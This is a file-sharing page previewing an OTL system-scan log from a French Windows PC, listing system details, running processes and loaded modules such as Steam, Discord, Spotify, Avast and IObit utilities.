cjoint

Publicité

Cliquez pour partager vos propres fichiers

Publicité

Format du document : text/plain

Prévisualisation

ÿþOTL logfile created on: 31/12/2018 11:41:56 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Thinkcentre\Desktop
64bit- Professional (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.16299.0)
Locale: 0000040c | Country: France | Language: FRA | Date Format: dd/MM/yyyy

7,98 Gb Total Physical Memory | 4,88 Gb Available Physical Memory | 61,14% Memory free
19,70 Gb Paging File | 14,66 Gb Available in Paging File | 74,43% Paging File free
Paging file location(s): b:\pagefile.sys 3956 3956c:\pagef [Binary data over 200 bytes]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 145,82 Gb Total Space | 10,96 Gb Free Space | 7,52% Space Free | Partition Type: NTFS
Drive D: | 175,83 Mb Total Space | 0,00 Mb Free Space | 0,00% Space Free | Partition Type: CDFS

Computer Name: LUCAS | User Name: Lucas | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - File not found --
PRC - [2018/12/31 11:38:55 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Thinkcentre\Desktop\OTL.exe
PRC - [2018/12/22 09:36:27 | 025,972,968 | ---- | M] (Spotify Ltd) -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\Spotify.exe
PRC - [2018/12/13 06:45:52 | 002,709,480 | ---- | M] (Adobe Systems, Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
PRC - [2018/12/13 06:45:50 | 002,917,864 | ---- | M] (Adobe Systems, Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
PRC - [2018/11/26 21:29:32 | 001,684,256 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe
PRC - [2018/11/26 21:29:30 | 003,131,680 | ---- | M] (Valve Corporation) -- B:\Steam\Steam.exe
PRC - [2018/04/30 22:01:12 | 057,816,920 | ---- | M] (Discord Inc.) -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\Discord.exe
PRC - [2018/03/13 06:19:07 | 000,649,304 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\fontdrvhost.exe
PRC - [2018/02/10 05:33:40 | 000,421,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
PRC - [2018/01/25 17:00:50 | 000,206,096 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
PRC - [2017/12/26 11:01:56 | 003,468,576 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
PRC - [2017/12/26 11:01:50 | 008,121,632 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe
PRC - [2017/12/11 19:03:12 | 003,598,624 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe
PRC - [2017/12/11 15:20:00 | 001,058,080 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
PRC - [2017/09/20 02:42:50 | 000,817,760 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
PRC - [2017/08/04 10:38:51 | 000,810,528 | ---- | M] (Avast Software) -- C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser_crashreporter.exe
PRC - [2017/08/04 10:38:50 | 000,797,728 | ---- | M] (Avast Software) -- C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser.exe
PRC - [2017/05/18 07:21:47 | 008,470,464 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
PRC - [2017/03/28 19:42:23 | 000,107,832 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrB.exe
PRC - [2017/02/17 08:59:28 | 005,430,048 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe
PRC - [2016/11/28 12:34:52 | 004,562,616 | ---- | M] (SuperBoost Software) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\SuperbGameBoostMain.exe
PRC - [2016/07/17 19:54:21 | 000,076,888 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2015/08/12 18:25:04 | 000,454,360 | ---- | M] (Realtek) -- C:\Windows\SwUSB.exe
PRC - [2014/12/12 17:24:50 | 000,044,760 | ---- | M] () -- C:\Windows\runSW.exe
PRC - [2012/07/30 08:42:50 | 000,258,048 | ---- | M] () -- C:\Program Files (x86)\On Networks\N150MA\WPSService.exe
PRC - [2011/06/30 21:23:46 | 000,167,936 | ---- | M] () -- C:\Program Files (x86)\On Networks\N150MA\WlanWpsSvc.exe
PRC - [2006/11/10 07:12:28 | 000,099,936 | ---- | M] () -- C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe


[color=#E56717]========== Modules (All) ==========[/color]

MOD - [2018/12/31 11:38:55 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Thinkcentre\Desktop\OTL.exe
MOD - [2018/12/22 09:36:31 | 088,824,552 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\libcef.dll
MOD - [2018/12/22 09:36:28 | 004,239,592 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\libglesv2.dll
MOD - [2018/12/22 09:36:28 | 000,098,024 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\libegl.dll
MOD - [2018/12/22 09:36:27 | 025,972,968 | ---- | M] (Spotify Ltd) -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\Spotify.exe
MOD - [2018/12/22 09:36:27 | 003,650,792 | ---- | M] (Microsoft Corporation) -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\D3DCompiler_47.dll
MOD - [2018/12/22 09:36:27 | 000,592,104 | ---- | M] (The Chromium Authors) -- C:\Users\Thinkcentre\AppData\Roaming\Spotify\chrome_elf.dll
MOD - [2018/12/19 13:37:48 | 001,658,712 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_game_utils\discord_game_utils.node
MOD - [2018/12/18 18:39:09 | 011,328,856 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_voice\discord_voice.node
MOD - [2018/12/13 18:18:13 | 001,261,400 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_modules\discord_modules.node
MOD - [2018/12/11 18:14:08 | 021,991,256 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_dispatch\discord_dispatch.node
MOD - [2018/11/26 21:29:42 | 000,318,752 | ---- | M] (Valve Corporation) -- B:\Steam\vstdlib_s.dll
MOD - [2018/11/26 21:29:40 | 002,649,376 | ---- | M] () -- B:\Steam\video.dll
MOD - [2018/11/26 21:29:40 | 000,318,752 | ---- | M] (Valve Corporation) -- B:\Steam\tier0_s.dll
MOD - [2018/11/26 21:29:38 | 012,719,904 | ---- | M] (Valve Corporation) -- B:\Steam\steamclient.dll
MOD - [2018/11/26 21:29:36 | 000,833,824 | ---- | M] (Valve Corporation) -- B:\Steam\bin\vgui2_s.dll
MOD - [2018/11/26 21:29:36 | 000,376,096 | ---- | M] (Valve Corporation) -- B:\Steam\crashhandler.dll
MOD - [2018/11/26 21:29:34 | 003,857,184 | ---- | M] (Valve Corporation) -- b:\Steam\bin\friendsui.dll
MOD - [2018/11/26 21:29:34 | 001,028,384 | ---- | M] () -- B:\Steam\bin\chromehtml.dll
MOD - [2018/11/26 21:29:34 | 000,188,192 | ---- | M] (Valve Corporation) -- B:\Steam\bin\filesystem_stdio.dll
MOD - [2018/11/26 21:29:32 | 001,833,248 | ---- | M] (Valve Corporation) -- b:\Steam\bin\serverbrowser.dll
MOD - [2018/11/26 21:29:30 | 011,252,000 | ---- | M] (Valve Corporation) -- B:\Steam\SteamUI.dll
MOD - [2018/11/26 21:29:30 | 003,131,680 | ---- | M] (Valve Corporation) -- B:\Steam\Steam.exe
MOD - [2018/11/16 18:17:40 | 001,639,256 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_utils\discord_utils.node
MOD - [2018/10/30 19:06:28 | 000,879,904 | ---- | M] () -- B:\Steam\SDL2.dll
MOD - [2018/10/19 15:46:41 | 001,249,112 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_vigilante\discord_vigilante.node
MOD - [2018/10/19 15:46:40 | 002,760,536 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_contact_import\discord_contact_import.node
MOD - [2018/10/19 15:46:29 | 009,621,848 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_cloudsync\discord_cloudsync.node
MOD - [2018/10/19 15:45:41 | 001,910,104 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_spellcheck\node_modules\cld\build\Release\cld.node
MOD - [2018/10/19 15:45:41 | 000,422,744 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_spellcheck\node_modules\spellchecker\build\Release\spellchecker.node
MOD - [2018/10/19 15:45:41 | 000,145,240 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_spellcheck\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node
MOD - [2018/10/19 15:45:40 | 002,722,648 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_rpc\discord_rpc.node
MOD - [2018/10/19 15:45:40 | 000,512,856 | ---- | M] () -- \\?\C:\Users\Thinkcentre\AppData\Roaming\discord\0.0.301\modules\discord_erlpack\discord_erlpack.node
MOD - [2018/05/04 09:13:24 | 004,775,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\WinSxS\x86_avast.vc140.mfc_fcc99ee6193ebbca_14.0.24210.0_none_a338d8ea2df29efb\mfc140u.dll
MOD - [2018/05/04 09:13:23 | 000,440,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\WinSxS\x86_avast.vc140.crt_fcc99ee6193ebbca_14.0.24210.0_none_9e58d6f8311e6fc8\msvcp140.dll
MOD - [2018/05/04 09:13:23 | 000,083,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\WinSxS\x86_avast.vc140.crt_fcc99ee6193ebbca_14.0.24210.0_none_9e58d6f8311e6fc8\vcruntime140.dll
MOD - [2018/04/30 22:01:12 | 057,816,920 | ---- | M] (Discord Inc.) -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\Discord.exe
MOD - [2018/04/30 22:01:12 | 014,742,360 | ---- | M] (Node.js) -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\node.dll
MOD - [2018/04/30 22:01:12 | 003,467,096 | ---- | M] (Microsoft Corporation) -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\D3DCompiler_47.dll
MOD - [2018/04/30 22:01:12 | 001,937,752 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\libglesv2.dll
MOD - [2018/04/30 22:01:12 | 001,891,672 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\ffmpeg.dll
MOD - [2018/04/30 22:01:12 | 000,095,576 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\libegl.dll
MOD - [2018/03/30 05:28:36 | 001,929,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\KernelBase.dll
MOD - [2018/03/30 05:28:26 | 000,777,912 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\rpcrt4.dll
MOD - [2018/03/30 05:27:49 | 000,481,464 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\advapi32.dll
MOD - [2018/03/30 05:24:01 | 000,212,896 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\aepic.dll
MOD - [2018/03/30 05:23:56 | 000,566,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\CoreMessaging.dll
MOD - [2018/03/30 05:19:23 | 006,092,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\windows.storage.dll
MOD - [2018/03/30 05:13:34 | 002,193,176 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\iertutil.dll
MOD - [2018/03/30 05:13:20 | 000,572,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.16299.371_none_d02abd455f338e37\comctl32.dll
MOD - [2018/03/30 05:10:17 | 000,099,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\rmclient.dll
MOD - [2018/03/30 05:10:09 | 000,704,080 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winhttp.dll
MOD - [2018/03/30 05:09:01 | 020,286,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\shell32.dll
MOD - [2018/03/30 05:07:49 | 002,150,808 | ---- | M] (Microsoft Corporation) -- C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.371_none_5d75084fa7e1cb96\comctl32.dll
MOD - [2018/03/30 05:07:39 | 001,003,160 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ole32.dll
MOD - [2018/03/30 05:04:45 | 000,417,368 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msvcp110_win.dll
MOD - [2018/03/30 04:46:09 | 001,470,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.371_none_8e5ffb3502744564\GdiPlus.dll
MOD - [2018/03/30 04:41:24 | 000,149,504 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\container.dll
MOD - [2018/03/30 04:41:13 | 000,369,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msIso.dll
MOD - [2018/03/30 04:36:56 | 002,869,760 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wininet.dll
MOD - [2018/03/30 04:36:47 | 001,560,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\urlmon.dll
MOD - [2018/03/13 06:19:09 | 001,615,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ntdll.dll
MOD - [2018/03/13 06:15:42 | 000,597,160 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dnsapi.dll
MOD - [2018/03/13 06:08:45 | 001,555,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\propsys.dll
MOD - [2018/03/13 06:04:27 | 001,057,824 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msvproc.dll
MOD - [2018/03/13 06:04:18 | 000,140,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\RTWorkQ.dll
MOD - [2018/03/13 05:43:39 | 000,096,256 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\fontsub.dll
MOD - [2018/03/13 05:40:38 | 000,201,728 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfksproxy.dll
MOD - [2018/03/13 05:39:19 | 000,176,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\fwpolicyiomgr.dll
MOD - [2018/03/13 05:37:45 | 000,233,984 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ksproxy.ax
MOD - [2018/03/13 05:37:39 | 000,374,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\FirewallAPI.dll
MOD - [2018/03/13 05:37:06 | 000,537,088 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mscms.dll
MOD - [2018/03/13 05:32:49 | 002,577,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\DWrite.dll
MOD - [2018/03/13 05:31:44 | 000,713,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
MOD - [2018/03/13 05:28:37 | 000,328,704 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ninput.dll
MOD - [2018/03/13 05:27:33 | 000,078,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\davclnt.dll
MOD - [2018/03/01 07:27:39 | 000,284,112 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wintrust.dll
MOD - [2018/03/01 07:26:41 | 001,524,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfplat.dll
MOD - [2018/03/01 06:58:50 | 000,368,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\daxexec.dll
MOD - [2018/02/22 01:12:33 | 000,076,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cldapi.dll
MOD - [2018/02/10 06:17:39 | 000,542,856 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Windows.StateRepositoryPS.dll
MOD - [2018/02/10 06:17:30 | 002,255,112 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msmpeg2vdec.dll
MOD - [2018/02/10 06:15:50 | 001,145,624 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ucrtbase.dll
MOD - [2018/02/10 06:12:03 | 004,382,032 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\setupapi.dll
MOD - [2018/02/10 06:10:34 | 000,422,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\policymanager.dll
MOD - [2018/02/10 06:09:28 | 002,338,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\d3d11.dll
MOD - [2018/02/10 06:09:24 | 000,559,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\StructuredQuery.dll
MOD - [2018/02/10 06:07:47 | 000,527,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\StateRepository.Core.dll
MOD - [2018/02/10 06:07:12 | 000,083,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winbrand.dll
MOD - [2018/02/10 06:07:09 | 000,543,920 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\AppXDeploymentClient.dll
MOD - [2018/02/10 06:06:01 | 000,982,528 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\AudioSes.dll
MOD - [2018/02/10 06:05:55 | 000,551,672 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mf.dll
MOD - [2018/02/10 06:05:53 | 000,662,208 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\evr.dll
MOD - [2018/02/10 06:05:47 | 000,193,248 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfsensorgroup.dll
MOD - [2018/02/10 06:03:12 | 000,505,160 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msvcp_win.dll
MOD - [2018/02/10 05:46:19 | 002,393,600 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\AcGenral.dll
MOD - [2018/02/10 05:41:10 | 000,063,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\nlaapi.dll
MOD - [2018/02/10 05:40:56 | 000,232,960 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\edputil.dll
MOD - [2018/02/10 05:40:50 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
MOD - [2018/02/10 05:39:55 | 000,462,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\webio.dll
MOD - [2018/02/10 05:35:47 | 004,384,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ExplorerFrame.dll
MOD - [2018/02/10 05:35:46 | 000,796,160 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ntshrui.dll
MOD - [2018/02/10 05:35:43 | 000,842,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\comdlg32.dll
MOD - [2018/02/10 05:31:12 | 001,159,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\vssapi.dll
MOD - [2017/12/26 11:01:56 | 003,468,576 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
MOD - [2017/12/26 11:01:50 | 008,121,632 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe
MOD - [2017/12/20 02:43:50 | 005,137,696 | ---- | M] () -- B:\Steam\libavcodec-57.dll
MOD - [2017/12/20 02:43:50 | 000,847,136 | ---- | M] () -- B:\Steam\libavutil-55.dll
MOD - [2017/12/20 02:43:50 | 000,783,648 | ---- | M] () -- B:\Steam\libswscale-4.dll
MOD - [2017/12/20 02:43:50 | 000,695,584 | ---- | M] () -- B:\Steam\libavformat-57.dll
MOD - [2017/12/20 02:43:50 | 000,351,520 | ---- | M] () -- B:\Steam\libavresample-3.dll
MOD - [2017/12/14 02:39:35 | 002,465,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfmp4srcsnk.dll
MOD - [2017/12/14 02:39:35 | 001,454,568 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfsrcsnk.dll
MOD - [2017/12/14 02:39:35 | 001,015,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
MOD - [2017/12/14 02:39:28 | 001,474,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\d3d9.dll
MOD - [2017/12/14 02:39:28 | 001,432,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\gdi32full.dll
MOD - [2017/12/14 02:39:28 | 000,769,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msvcrt.dll
MOD - [2017/12/14 02:39:28 | 000,614,912 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\apphelp.dll
MOD - [2017/12/14 02:39:28 | 000,101,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msscript.ocx
MOD - [2017/12/14 02:39:21 | 001,528,904 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\user32.dll
MOD - [2017/12/14 02:39:21 | 001,261,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\twinapi.appcore.dll
MOD - [2017/12/14 02:39:21 | 000,590,944 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dxgi.dll
MOD - [2017/12/14 02:39:21 | 000,353,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\bcryptprimitives.dll
MOD - [2017/12/14 02:39:21 | 000,160,256 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\smartscreenps.dll
MOD - [2017/12/14 02:39:18 | 001,323,840 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msctf.dll
MOD - [2017/12/14 02:39:18 | 000,372,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\AcLayers.dll
MOD - [2017/12/14 02:39:18 | 000,097,144 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\bcrypt.dll
MOD - [2017/12/11 19:03:12 | 003,598,624 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe
MOD - [2017/12/09 15:52:04 | 000,215,840 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\sdcore.dll
MOD - [2017/12/09 15:51:58 | 000,116,000 | ---- | M] (IObit.) -- C:\Program Files (x86)\IObit\Advanced SystemCare\PowerConfig.dll
MOD - [2017/12/09 15:51:42 | 000,178,464 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\HardwareLib.dll
MOD - [2017/12/09 15:51:28 | 000,075,040 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\dataexchange.dll
MOD - [2017/12/09 15:51:22 | 000,136,480 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\CPUIDInterface.dll
MOD - [2017/11/26 12:12:47 | 000,123,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\sspicli.dll
MOD - [2017/11/02 17:17:00 | 000,901,408 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\OFCommon.dll
MOD - [2017/10/18 11:44:22 | 000,900,896 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\webres.dll
MOD - [2017/09/29 14:42:27 | 000,419,328 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winspool.drv
MOD - [2017/09/29 14:42:27 | 000,409,168 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ws2_32.dll
MOD - [2017/09/29 14:42:27 | 000,327,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wlanapi.dll
MOD - [2017/09/29 14:42:27 | 000,267,112 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\sechost.dll
MOD - [2017/09/29 14:42:27 | 000,073,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\profapi.dll
MOD - [2017/09/29 14:42:27 | 000,031,584 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cryptbase.dll
MOD - [2017/09/29 14:42:26 | 001,211,904 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfc42.dll
MOD - [2017/09/29 14:42:26 | 000,594,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\kernel32.dll
MOD - [2017/09/29 14:42:26 | 000,083,456 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\atl.dll
MOD - [2017/09/29 14:42:25 | 000,537,360 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\taskschd.dll
MOD - [2017/09/29 14:42:25 | 000,472,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\uxtheme.dll
MOD - [2017/09/29 14:42:25 | 000,263,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winsta.dll
MOD - [2017/09/29 14:42:25 | 000,053,760 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\vsstrace.dll
MOD - [2017/09/29 14:42:25 | 000,052,384 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wtsapi32.dll
MOD - [2017/09/29 14:42:25 | 000,020,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\drprov.dll
MOD - [2017/09/29 14:42:24 | 001,336,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Speech\Common\sapi.dll
MOD - [2017/09/29 14:42:24 | 000,279,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\shlwapi.dll
MOD - [2017/09/29 14:42:24 | 000,229,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\shdocvw.dll
MOD - [2017/09/29 14:42:24 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\sfc_os.dll
MOD - [2017/09/29 14:42:24 | 000,041,984 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cscapi.dll
MOD - [2017/09/29 14:42:24 | 000,033,792 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\linkinfo.dll
MOD - [2017/09/29 14:42:24 | 000,027,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\version.dll
MOD - [2017/09/29 14:42:24 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\davhlpr.dll
MOD - [2017/09/29 14:42:24 | 000,002,560 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\sfc.dll
MOD - [2017/09/29 14:42:23 | 000,541,392 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\sxs.dll
MOD - [2017/09/29 14:42:23 | 000,332,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\oleacc.dll
MOD - [2017/09/29 14:42:23 | 000,236,544 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\qwave.dll
MOD - [2017/09/29 14:42:23 | 000,089,088 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\olepro32.dll
MOD - [2017/09/29 14:42:23 | 000,035,840 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\traffic.dll
MOD - [2017/09/29 14:42:23 | 000,012,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\rasadhlp.dll
MOD - [2017/09/29 14:42:23 | 000,004,608 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\security.dll
MOD - [2017/09/29 14:42:22 | 000,777,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\opengl32.dll
MOD - [2017/09/29 14:42:22 | 000,176,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\netprofm.dll
